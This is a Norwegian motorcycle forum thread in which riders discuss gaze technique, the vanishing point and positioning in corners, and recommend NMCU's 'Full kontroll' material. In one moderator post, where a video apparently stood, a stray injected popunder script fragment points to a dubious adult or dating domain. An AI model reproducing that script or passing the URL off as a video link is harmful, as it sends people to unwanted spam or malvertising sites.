Blikkbruk og plassering i veibanen

Generelt om MC, nyheter, hendelser, film & bilder, MC i media, kjøreopplæring osv.
Svar
Brukeravatar
PWL
Innlegg: 144
Registrert: 18 apr 2019, 11:08
Motorsykkelen din: Honda CBF125, 2009
Sted: Moss

Blikkbruk og plassering i veibanen

Legg inn av PWL »

Forrige sesong gikk stort sett til feilsøking og sykkelbytte, så jeg føler meg allerede litt ute av trening pga det. Av den grunn begynte jeg å tenke mye over blikket mens jeg kjørte bil. Jeg mister overraskende mye oversikt over hvor jeg ligger i svingen hvis jeg fester blikket på forsvinningspunktet(?).

Dette kjenner jeg også igjen fra å kjøre sykkel, så jeg tror kanskje at jeg flakker litt ned med blikket for å "sjekke hvor jeg er" med jevne mellomrom. Er det vanlig å gjøre, eller kommer følelsen av posisjon med tiden? Og kan jeg egentlig øve på det i bil, eller funker det dårlig? Bilen er jo litt bredere :P

Kanskje litt tidlig å overtenke dette før sesongen har startet og jeg får prøvd meg igjen, men jeg er litt utålmodig og kan like gjerne være bevisst på dette fra starten av.
"En amatør prøver seg"
2021: Honda CBF125 2009
2019-2021: Honda CBR600F 2000

Jajo82
Innlegg: 334
Registrert: 11 nov 2016, 19:53
Motorsykkelen din: Triumph tiger 1200 rally pro 2022
Sted: Sarpsborg

Re: Blikkbruk og plassering i veibanen

Legg inn av Jajo82 »

Nmcu har noen brukbare videoer om dette på YouTube.
Men med mer erfaring så kommer også blikkbruket inn.

Online
Brukeravatar
dypen
Innlegg: 5236
Registrert: 28 mai 2018, 20:55
Motorsykkelen din: K1600GT
Sted: Lillestrøm

Re: Blikkbruk og plassering i veibanen

Legg inn av dypen »

Alltid opp og frem med blikket, spesielt i sving husk å se så langt frem som mulig da blir plassering og kursen bedre :)
dypen :thumleft
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2

Brukeravatar
Erlendos
Innlegg: 25
Registrert: 23 mar 2017, 12:03
Motorsykkelen din: BMW R Nine T 2014
Sted: Tønsberg

Re: Blikkbruk og plassering i veibanen

Legg inn av Erlendos »

Ja, man bør søke opp og frem med blikket. Da får man mer oversikt og kan reagere tidligere. Sidesynet ordner resten.

Når det er sagt så er det normalt å flytte blikket ofte, det er jo utrolig mye informasjon som skal innhentes når man kjører.
Om blikket blir stivt og kun hviler på et fast punkt er det et tegn på at du er sliten og bør ta deg en pause.

Yamaha XJ 600 N '94 2006-2008
Honda CBR 600 F '99 2008-2012
BMW RNineT 1200 '14 2016-

Brukeravatar
FredrikE24
Innlegg: 4715
Registrert: 24 apr 2016, 18:53
Motorsykkelen din: BMW K1200RS
Sted: Nordre Follo

Re: Blikkbruk og plassering i veibanen

Legg inn av FredrikE24 »

Og tenderer blikket til å bli stivt, blir du selv stiv også drar du av.

NMCU Full kontrol er sengelektyre og bør leses fra perm til perm i ny og ne. Den belyser noen viktige knagger man bør henge seg på.
Å kjøre svinger er en teknikk, hvor man gjør svingen i en bestemt rekkefølge med gassbruk, bremsbruk, styrekommando, kroppsbruk og blikkbruk i harmoni. Om man ikke terper på slik svingteknikk, så blir kjøringen slitsom, usammenhengende og man blir stadig overrasket over ting som oppstår på veien som medfører fare. Ikke bare er det noe man bør sette seg inn i og bli god på, men det gjør motorsykkelkjøringen mye mer avslappet og hyggeligere også enn å sitte anspent.

Brukeravatar
PWL
Innlegg: 144
Registrert: 18 apr 2019, 11:08
Motorsykkelen din: Honda CBF125, 2009
Sted: Moss

Re: Blikkbruk og plassering i veibanen

Legg inn av PWL »

Erlendos skrev: 09 mar 2022, 13:00 Ja, man bør søke opp og frem med blikket. Da får man mer oversikt og kan reagere tidligere. Sidesynet ordner resten.
Tydeligvis sidesynet som må få seg litt mengdetrening, hehe :thumleft

Jeg hadde helt glemt Full kontroll-serien, selv om jeg faktisk så en video fra den senest her om dagen. På tide å kaste seg over hele igjen!

Takk for oppklaringer alle sammen.
"En amatør prøver seg"
2021: Honda CBF125 2009
2019-2021: Honda CBR600F 2000

BjørnSover
Innlegg: 392
Registrert: 01 des 2020, 21:34
Motorsykkelen din: BMW R1200GSA 2018
Sted: Stavanger

Re: Blikkbruk og plassering i veibanen

Legg inn av BjørnSover »

FredrikE24 skrev: 09 mar 2022, 13:49 NMCU Full kontrol er sengelektyre og bør leses fra perm til perm i ny og ne. Den belyser noen viktige knagger man bør henge seg på.
Er det mer nyttig i boken en i filmene?

Online
Brukeravatar
AJ
Administrator
Innlegg: 37849
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: Blikkbruk og plassering i veibanen

Legg inn av AJ »

BjørnSover skrev: 09 mar 2022, 15:40
FredrikE24 skrev: 09 mar 2022, 13:49 NMCU Full kontrol er sengelektyre og bør leses fra perm til perm i ny og ne. Den belyser noen viktige knagger man bør henge seg på.
Er det mer nyttig i boken en i filmene?
Bøkene synes jeg er pedagogisk gode. Ble faktisk ganske så overrasket da leste disse første gangen.
Lettlest med gode eksempler, illustrasjoner og foklaringer.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
FredrikE24
Innlegg: 4715
Registrert: 24 apr 2016, 18:53
Motorsykkelen din: BMW K1200RS
Sted: Nordre Follo

Re: Blikkbruk og plassering i veibanen

Legg inn av FredrikE24 »

Video er vel og bra, men ingenting slår bøker. Og boka er veldig bra.

Brukeravatar
kjellv
Moderator
Innlegg: 6953
Registrert: 14 aug 2012, 23:16
Motorsykkelen din: Yamaha XT1200ZE Super Ténéré
Sted: Molde
Kontakt:

Re: Blikkbruk og plassering i veibanen

Legg inn av kjellv »

Se gjerne også denne filmen. Begrepet "forsvinningspunkt" fokuserer vi mye på vi som er instruktører i NAF MC sine "Sikker på MC" kurs.

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}

Brukeravatar
Bjerknez
Innlegg: 22867
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Blikkbruk og plassering i veibanen

Legg inn av Bjerknez »

Jeg tror dette med forsvinningspunkt kommer naturlig når man får kjørt litt. Er jo helt logisk og være på "jakt" etter mulige hindringer i veibanen når man kjører slik som på videoen. Men vil jo alltid se så langt frem som mulig.

Hovedproblemet slik jeg ser det vedrørende ulykker er ikke nødvendigvis feil teknikk med tanke på blikk, men for høy fart, slik at teknikken ikke fungerer.

Problemet er de fleste av oss ikke vet nøyaktig hvor gode vi faktisk er, og det eneste som nærmest helgarderer oss er og kjøre med store marginer. Men klart, det er ikke alltid så gøy for mange....

Brukeravatar
FredrikE24
Innlegg: 4715
Registrert: 24 apr 2016, 18:53
Motorsykkelen din: BMW K1200RS
Sted: Nordre Follo

Re: Blikkbruk og plassering i veibanen

Legg inn av FredrikE24 »

Du kan kjøre fortere og mer sammenhengende om teknikken sitter. Da kommer ikke overraskelsene ofte heller.

Kjører stort sett tur med en gjeng på 8-12 sykler i gruppe en helg i året. Det er «rått» hvor mye bremselys det er hos mange midt i svingene på Fredag og midtveis på Lørdagen hvor Søndagen går smooooth som bare det..

Brukeravatar
Bjerknez
Innlegg: 22867
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Blikkbruk og plassering i veibanen

Legg inn av Bjerknez »

FredrikE24 skrev: 09 mar 2022, 21:08 Du kan kjøre fortere og mer sammenhengende om teknikken sitter. Da kommer ikke overraskelsene ofte heller.

Kjører stort sett tur med en gjeng på 8-12 sykler i gruppe en helg i året. Det er «rått» hvor mye bremselys det er hos mange midt i svingene på Fredag og midtveis på Lørdagen hvor Søndagen går smooooth som bare det..
Joa, men det hjelper lite hvor flink man er til å bruke blikket, hvis man ikke klarer og stoppe/svinge unna en hindring som dukker opp. Fart i forhold til ferdighet er vel nesten alltid en av hovedårsakene til at ulykker skjer og ikke nødvendigvis at man brukte blikket feil. ?

Brukeravatar
FredrikE24
Innlegg: 4715
Registrert: 24 apr 2016, 18:53
Motorsykkelen din: BMW K1200RS
Sted: Nordre Follo

Re: Blikkbruk og plassering i veibanen

Legg inn av FredrikE24 »

Handler ikke bare om blikkbruk. Når du begynner å ta for deg en sving, så er det en del ting som skal være på plass før man kan gi jernet på vei ut. Veldig mange holder for høy fart inn i svinger, med påfølgende mye bremsing og fjas.

Brukeravatar
Gammelsmurfen
Innlegg: 1289
Registrert: 09 nov 2020, 19:05
Motorsykkelen din: BMW F850GS Rally 2022

Re: Blikkbruk og plassering i veibanen

Legg inn av Gammelsmurfen »

Bjerknez skrev: 09 mar 2022, 21:17
FredrikE24 skrev: 09 mar 2022, 21:08 Du kan kjøre fortere og mer sammenhengende om teknikken sitter. Da kommer ikke overraskelsene ofte heller.

Kjører stort sett tur med en gjeng på 8-12 sykler i gruppe en helg i året. Det er «rått» hvor mye bremselys det er hos mange midt i svingene på Fredag og midtveis på Lørdagen hvor Søndagen går smooooth som bare det..
Joa, men det hjelper lite hvor flink man er til å bruke blikket, hvis man ikke klarer og stoppe/svinge unna en hindring som dukker opp. Fart i forhold til ferdighet er vel nesten alltid en av hovedårsakene til at ulykker skjer og ikke nødvendigvis at man brukte blikket feil. ?
Enig med deg i det Bjerknez kjøre etter evne eller fornuft, på steder hvor jeg vet at det er mye elg og skog tett på så "skanner" jeg skauen på begge sider, det har reddet meg for nær elg-kollisjon flere ganger med bil og en gang med mc.
Eller på steder med mye skader og hull i asfalten, så er det ikke så lett å skille en "patch" fra et ureparert hull uten å flytte blikket da man nærmer seg.
Apropo bremselys i sving FredrikE24, kan være trail braking og da :D

Svar